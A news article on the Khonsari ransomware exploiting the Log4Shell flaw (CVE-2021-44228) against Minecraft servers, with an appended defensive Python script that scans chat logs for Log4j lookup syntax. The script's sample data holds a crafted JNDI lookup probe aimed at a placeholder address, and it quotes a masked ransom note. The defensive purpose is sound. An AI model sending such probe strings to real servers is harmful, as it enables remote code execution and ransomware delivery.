Khonsari ransomware exploiting Log4j bug to target Minecraft servers, Microsoft confirms
Researchers observe multiple attempts to deploy Khonsari ransomware, which hits Windows machines by making use of the Log4Shell bug
Microsoft reported on Wednesday that threat actors are attempting to deliver a new family of ransomware, dubbed Khonsari, on self-hosted Minecraft servers by exploiting the critical Log4Shell security vulnerability.
In an update to its blog post about the security bug, the Redmond-based software giant said it can confirm the findings of cyber security firm Bitdefender, which disclosed earlier this week the existence of the new Khonsari ransomware strain.
Bitdefender said it had observed multiple attempts by attackers to deploy a Khonsari ransomware payload, which hits Windows machines by making use of the Log4Shell bug.
"Your files have been encrypted and stolen by the Khonsari family," Khonsari operatives write in their ransom note, according to Bitdefender.
"If you wish to decrypt, call (***) ***-1309 or email kar***[email protected]. If you do not know how to buy btc [Bitcoin], use a search engine to find exchanges. DO NOT MODIFY OR DELETE THIS FILE OR ANY ENCRYPTED FILES. IF YOU DO, YOUR FILES MAY BE UNRECOVERABLE."
In the case of non-Microsoft hosted Minecraft servers, Microsoft says threat actors have been sending malicious in-game messages to vulnerable servers. These malicious messages later exploit the Log4Shell bug to retrieve and run a malicious payload on both the vulnerable server as well as on any vulnerable clients that are connected.
The threat actors package Khonsari ransomware as a malicious Java class file, which is executed in the context of javaw.exe to ransom the device.
"In Microsoft Defender Antivirus data, we have observed a small number of cases of this [ransomware] being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader," Microsoft said.
The company is now advising all Minecraft server admins to immediately install the latest updates to secure them against these attacks. Players have been asked to exercise caution by only connecting to trusted Minecraft servers.
Last week, Mojang Studios, the video game developer behind Minecraft, released an emergency security update to address the Log4Shell vulnerability in the Apache Log4j Java logging library that is used by the game's Java Edition client and multiplayer servers.
"If you are running a multiplayer server, we highly encourage you to upgrade to this version as soon as possible," the advisory said.
Log4Shell, tracked as CVE-2021-44228, was publicly disclosed last week.
According to researchers, the bug exists in the Apache Log4j Java logging library and is highly dangerous, widespread and easy to exploit.
The flaw, tracked as CVE-2021-44228, allows attackers to execute malicious code on Java applications.
The vulnerability is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j vulnerable component.
The bug poses a serious danger both because of the ubiquity of Log4j and because such an attack is easy to pull off.
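Because the trigger is a crafted string reaching a logging call, the server's own log file is where an attempt leaves a trace: on a Minecraft server, a chat message is written to the log as-is, so a Log4j lookup expression typed into chat is visible on the line that logged it. The following is an added example for defenders, not code from the article, Microsoft, Bitdefender or Mojang. It scans constructed sample log lines in the chat format a vanilla Minecraft server writes (the `<player> message` layout and the sample text are assumptions) and flags any message carrying Log4j lookup syntax, rating an explicit JNDI lookup higher than other `${...}` text so that harmless player chat can be triaged rather than dropped.

```python
import re

# Constructed sample log lines (not from the article) in the format a vanilla
# Minecraft server writes for player chat. The lookup on the third line stands
# in for a Log4Shell probe sent as an in-game message; 198.51.100.7 is a
# documentation-range address, not a real host.
SAMPLE_LOG_LINES = [
    "[12:00:01] [Server thread/INFO]: <Steve> hello everyone",
    "[12:00:04] [Server thread/INFO]: <Alex> anyone got ${money}?",
    "[12:00:05] [Server thread/INFO]: <Mallory> ${jndi:ldap://198.51.100.7/x}",
    "[12:00:09] [Server thread/INFO]: <Steve> gg",
]

# Assumed chat layout: "<player> message" at the end of the log line.
CHAT_RE = re.compile(r"<(?P<player>[^>]+)> (?P<msg>.*)$")
# Any Log4j lookup syntax. A player has no legitimate reason to type it, but
# "${something}" does occur in ordinary chat, so it is only a medium signal.
LOOKUP_RE = re.compile(r"\$\{")
# A JNDI lookup inside that syntax is the Log4Shell trigger itself.
JNDI_RE = re.compile(r"jndi:", re.IGNORECASE)


def classify_message(msg):
    """Return a severity for one chat message, or None if it looks benign."""
    if LOOKUP_RE.search(msg) and JNDI_RE.search(msg):
        return "high"    # explicit JNDI lookup: treat as an exploitation attempt
    if LOOKUP_RE.search(msg):
        return "medium"  # lookup syntax without jndi: inspect, may be a false positive
    return None


def scan_log_lines(lines):
    """Return one finding per chat line whose message contains lookup syntax."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        match = CHAT_RE.search(line)
        if not match:
            continue  # not a chat line; other log lines are not scanned here
        severity = classify_message(match.group("msg"))
        if severity is not None:
            findings.append({
                "line": lineno,
                "player": match.group("player"),
                "severity": severity,
                "message": match.group("msg"),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: [{finding['severity']}] "
              f"<{finding['player']}> {finding['message']}")
```

One caveat a practitioner should keep in mind: on an unpatched server the lookup has already been evaluated by Log4j by the time the line is written, so a scan like this is for hunting and for confirming that attempts are arriving at a server that has already been updated or had lookups disabled. It does not replace installing the update Mojang and Microsoft advise.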
Researchers at security firm Check Point said this week that they had observed Iranian hacking group APT 35 trying to exploit CVE-2021-44228 to target seven entities in the Israeli government and business sector.
"Reports of the last 48 hours prove that both criminal hacking groups and nation state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors' operations are to be revealed in the coming days," the researchers said.